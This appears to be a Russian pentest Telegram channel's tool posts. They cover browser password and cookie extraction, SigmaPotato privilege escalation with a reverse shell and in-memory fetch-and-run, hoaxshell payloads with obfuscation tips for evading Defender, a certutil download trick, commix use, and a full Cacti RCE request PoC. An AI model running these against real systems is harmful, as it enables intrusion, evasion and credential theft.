Очень быстрый сканер портов написанный на Rust
Установка в Debian like:
sudo dpkg -i rustscan_(ver).debИспользование:
rustscan -a 127.0.0.1,0.0.0.0rustscan -a 192.168.0.0/30rustscan -a 'hosts.txt'rustscan -a 127.0.0.1 --range 1-1000#rustscan #rust #soft #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент помогающий вспомнить "забытые" пароли от различных браузеров. Также извлекает 🍪 cookie, закладки и историю. Написан на
Поддержка браузеров в
Google Chrome
Chromium
Microsoft Edge
360 Speed
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox
Примеры использования:
hack-browser-data.exe -b all -f json --dir results --zip
hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"
#hackbrowserdata #golang #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
NTLM.PW
NTLM to plaintext password lookup
Instantly look up NTLM hashes and resolve them to plaintext passwords using our database with 8B+ entries.
Сервис уже не новый, но крайне полезный
Я немного запоздал с постом 😄👍
#ntlm #hash
Please open Telegram to view this post
VIEW IN TELEGRAM
Современный высокоскоростной фаззер написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.
Kali:
sudo apt update && sudo apt install -y feroxbuster
Windows via chocolatey:
choco install feroxbuster
Примеры:feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx
feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"
feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080
#feroxbuster #fuzzing #rust #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент для повышения привилегий в
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege
Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.
whoami /privИз плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a
Примеры:
./SigmaPotato.exe --revshell ip port[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))
[SigmaPotato]::Main(@("--revshell","ip","port"))Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022
#potato #lpe #windows #soft #sigmapotato
Please open Telegram to view this post
VIEW IN TELEGRAM
🎟 btconverter
При пентесте🪟 Active Directory очень часто приходиться работать с Kerberos и в частности с получением и использованием билетов
Для данных целей обычно используют следующие инструменты:
💻 Rubeus
💻 Impacket
При дампе или запросе в Rubeus мы получим закодированный в base64 билет
Если захотим использовать его в инструментах impacket, необходимо конвертировать в формат ccache
Обычно это делается так:
При получение билета в impacket будем конвертировать в обратном порядке. Иной раз делать это приходиться очень часто, поэтому написал небольшой скрипт для автоматизации данной задачи
Для работы скрипта в💻 Kali есть все необходимые тулзы. Если по какой то причине impacket не установлен:
Далее ставим скрипт:
На вход принимает 1 аргумент, билет в формате .b64|kirbi|ccache
Готово!
💻 Home
#kerberos #tickets #bash #impacket #rubeus
✈️ Whitehat Lab
При пентесте
Для данных целей обычно используют следующие инструменты:
При дампе или запросе в Rubeus мы получим закодированный в base64 билет
Если захотим использовать его в инструментах impacket, необходимо конвертировать в формат ccache
Обычно это делается так:
echo "doIGIDCCBhygAwIBBaE(..snip..)9SRzE3LkxPQ0FM" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
При получение билета в impacket будем конвертировать в обратном порядке. Иной раз делать это приходиться очень часто, поэтому написал небольшой скрипт для автоматизации данной задачи
Для работы скрипта в
sudo apt update
sudo apt install python3-impacket
Далее ставим скрипт:
wget https://raw.githubusercontent.com/akhomlyuk/btconverter/main/btconverter.sh
chmod +x btconverter.sh
sudo mv btconverter.sh /usr/bin/btconverter
На вход принимает 1 аргумент, билет в формате .b64|kirbi|ccache
btconverter ticket.b64btconverter ticket.ccachebtconverter ticket.kirbiГотово!
#kerberos #tickets #bash #impacket #rubeus
Please open Telegram to view this post
VIEW IN TELEGRAM
Отличный инструмент предназначенный для отслеживания процессов без необходимости использования root прав. Он позволяет видеть команды выполняемые другими пользователями, задания cron и т. д.
Написан на Go. Постоянно использую при решение машин на
Запуск в
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64./pspy64-r - список директорий для отслеживания (по дефолту /usr, /tmp, /etc, /home, /var и /opt)
-i - интервал в мс
-f - события файловой системы
--debug - вывод подробной информации
Готово, рекомендую!
#golang #pspy #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Чекер CVEs и уязвимостей написанный на C# для ОС
Поддерживаемые версии:
Windows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)
Windows 11 (Versions: 21H2, 22H1, 22H2, 23H1)
Windows Server 2016, 2019, 2022
Список уязвимостей (35):
MS10-015
MS10-092
MS13-053
MS13-081
MS14-058
MS15-051
MS15-078
MS16-016
MS16-032
MS16-034
MS16-135
CVE-2017-7199
CVE-2019-0836
CVE-2019-0836
CVE-2019-1064
CVE-2019-1130
CVE-2019-1253
CVE-2019-1315
CVE-2019-1385
CVE-2019-1388
CVE-2019-1405
CVE-2020-0668
CVE-2020-0683
CVE-2020-0796
CVE-2020-1013
CVE-2020-1013
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
CVE-2021-44228
CVE-2021-36934
CVE-2022-40140
CVE-2022-22965
CVE-2023-36664
1.2 added:
2023-23397
2022-34718
Также бот поддерживает поиск эксплоитов по CVE
!poc CVE-2019-1064Для сборки понадобится Visual Studio и .NET Framework 4.8 Developer Pack
#moriarty #checker #csharp
Please open Telegram to view this post
VIEW IN TELEGRAM
Сборник скомпилированных C# инструментов для наступательной безопасности.
Для ленивых или когда под рукой нет
Некоторые:
86 инструментов
#csharp #collection #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ ffuf - Fuzz Faster U Fool v2.1.0
💻 Очень быстрый веб фаззер написанный на 🖼️ Go
Fuzzing - перебор директорий, параметров, заголовков (headers)
ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы.
В💻 Kali установлен по умолчанию.
Установка:
Основные фильтры:
Заворачиваем в😈 Burp (proxy):
Флаг
💻 Home
#ffuf #fuzzing #fuzzer #golang
✈️ Whitehat Lab
Fuzzing - перебор директорий, параметров, заголовков (headers)
ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы.
В
Установка:
go install github.com/ffuf/ffuf/v2@latest
Примеры использования:ffuf -w /wordlists/rockyou.txt -u https://example.com/FUZZ
ffuf -w /wordlists/rockyou.txt -u https://example.com/page.php?FUZZ=1
ffuf -w /wordlists/rockyou.txt -u https://example.com -H "Host: FUZZ.example.com"
Основные фильтры:
fc - HTTP status (-fc 404)
fs - размер ответа (-fs 0)
fl - кол-во линий (-fl 16)
fw - кол-во слов (-fw 2)
Заворачиваем в
-x "https://127.0.0.1:8080"Флаг
-c сделает вывод цветным, рекомендую, по дефолту - False#ffuf #fuzzing #fuzzer #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
😁1
7 уроков от Microsoft
Что охватывает курс
🔧 Примеры инструментов, используемых для реализации мер безопасности
Чего курс не охватывает
#microsoft #cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Замечательный open source продукт которым пользуются кибер-криминалисты по всему миру. Это графический интерфейс для коллекции утилит под названием The Sleuth Kit (TSK)
Работает с образами дисков и не только, список поддерживаемых файловых систем:
NTFS, FAT, ExFAT, UFS 1, UFS 2, EXT2FS, EXT3FS, Ext4, HFS, ISO 9660, и YAFFS2В
sudo apt install autopsyТакже есть версии для Windows, Linux и OS X
#autopsy #sleuthkit #forensics #dfir
Please open Telegram to view this post
VIEW IN TELEGRAM
Основные инструменты:
gem install zsteg
zsteg -a pic.png
pip install --user git+https://github.com/Hedroed/png-parser
png-parser pic.png
sudo apt install steghide
steghide extract -sf pic.jpg
sudo apt install ./stegseek_0.6-1.deb
stegseek pic.jpg rockyou.txt
pip3 install stegoveritas
stegoveritas pic.png
java -jar StegSolve.jar
exiftool pic.png
sudo apt install pngcheck
pngcheck -v pic.png
pip3 install stegpy
stegpy pic.png
#steganography #tools #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Шпаргалка по скриптам, библиотекам и бинарным файлам в ОС
Вбиваем название утилиты и смотрим как с ней можно взаимодействовать
Например - Certutil.exe
Можем скачать файл из сети:
certutil.exe -urlcache -split -f https://7-zip.org/a/7z1604-x64.exe 7zip.exe
#lolbas #cheatsheet #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Указываем доступный нам вид реквизитов (логин, пароль, хеш, билет и т.д.) и сервис покажет что и как мы можем использовать.
https://wadcoms.github.io
#windows #activedirectory #wadcoms #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 hoaxshell
Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)
Установка:
Примеры:
-i -
-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация
Полезные ключи
Ручная обфускация:
Надо заменить
Примеры:
С реГисТром можно и нужно играться
😹 Home
#hoaxshell #powershell #python #soft #manual
✈️ Whitehat Lab
Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)
Установка:
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
Примеры:
python3 hoaxshell.py -s 192.168.1.36 -iro -H "Authorization"
-i -
Invoke-RestMethod вместо Invoke-WebRequest-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация
Полезные ключи
-ng и -lt для создания ngrok или localtunnel сессииРучная обфускация:
Надо заменить
Invoke-RestMethod и Invoke-WebRequest на аналоги и/или напихать кавычек. Мы же любим кавычки ? 😃Примеры:
i''nV''okE-R''eStMe''Th''oD
ir''M
i''eX
Ir''M
С реГисТром можно и нужно играться
#hoaxshell #powershell #python #soft #manual
Please open Telegram to view this post
VIEW IN TELEGRAM
UPD. Большой апдейт до major ветки 4.0
Комбайн для эксплуатации Command Injection уязвимостей, написан на python
В
git clone https://github.com/commixproject/commix.git commix
python commix.py -h
"Детский" режим:
python commix --wizard
Обычный запуск:
python commix -u https://62.173.140.174:16016/ --data 'action='
Поддержка тамперов:
python commix -u https://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs
Список тамперов:
python commix --list-tampers#commix #python #pentest #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Отличный инструмент для проведения enumeration в
UPD. Добавили поддержку Windows 2025
Представлен в 2х вариантах, стандарт и лайт
Полная версия имеет встроенный модуль SharpHound для сбора информации в
Стандартный запуск:
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Доступные модули:
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках
Rights - поиск различных прав, например LAPS, DCSync и т.д.
GPO - базовая информация о групповых политиках
ADCS - информация о центрах сертификации
Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.
Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей
Accounts - информация об аккаунтах
Computer - AD DS, AD CS, Exchange серверы и т.д.
BloodHound - сборщик данных для BH
Варианты запуска:
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Определенная УЗ:
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Модули:
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All
#soft #powershell #activedirectory #enumeration
Please open Telegram to view this post
VIEW IN TELEGRAM
Arbitrary File Creation leading to RCE
Позволяет аутентифицированному пользователю злоупотребить функциями создания графов и шаблонов графов для записи произвольных PHP-скриптов в корень сайта
PoC:
POST https://192.168.178.78/cacti/graph_templates.php?header=false HTTP/1.1
host: 192.168.178.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 804
Origin: https://192.168.178.78
Connection: keep-alive
Referer: https://192.168.178.78/cacti/graph_templates.php?action=template_edit&id=297&csrf_timeout=true&csrf_timeout=true
Cookie: CactiDateTime=Fri Jan 03 2025 14:03:51 GMT+0000 (Greenwich Mean Time); CactiTimeZone=0; Cacti=r378gdiav394djct96o26mliud; cacti_remembers=1%2C0%2C1ac46cea6e1f0225f6e52320b4d734503fac5215a76879b3cb2c939d5cc56c49
Priority: u=0
__csrf_magic=sid%3A3363ef9d47d62372302b4941b790e92f5f749d9c%2C1735913031&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save
#web #rce #cacti #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.
Состоит из трёх частей: заголовок, пейлоад и подпись
Пример простейшей реализации на Python
import json
import hmac
import hashlib
import base64
import uuid
header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())
def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))
merge_payload_header = b'.'.join(jwt_parts)
signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))
return b'.'.join(jwt_parts)
print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))
#jwt #token #flask #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Обновление отличного кроссплатформенного инструмента для визуализации, построения графов, связей и исследования Active Directory.
Даст мгновенные результаты, показывая, какие разрешения имеют пользователи и группы в
Проект активно развивается. Написан на
Отличия от
Не требуется Neo4J, Python
Не требуется предварительной настройки
Для построения запросов используется расширенный LDAP синтаксис
Наличие бесплатной и коммерческой версии
Машина в домене:
adalanche.exe collect activedirectory
Машина не в домене:
adalanche.exe collect activedirectory --ignorecert --domain contoso.local --authdomain CONTOSO --username dom_user --password P@ssw0rd
Будет создана папка
dataАнализ:
adalanche.exe analyze
#adalanche #golang #soft #activedirectory
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1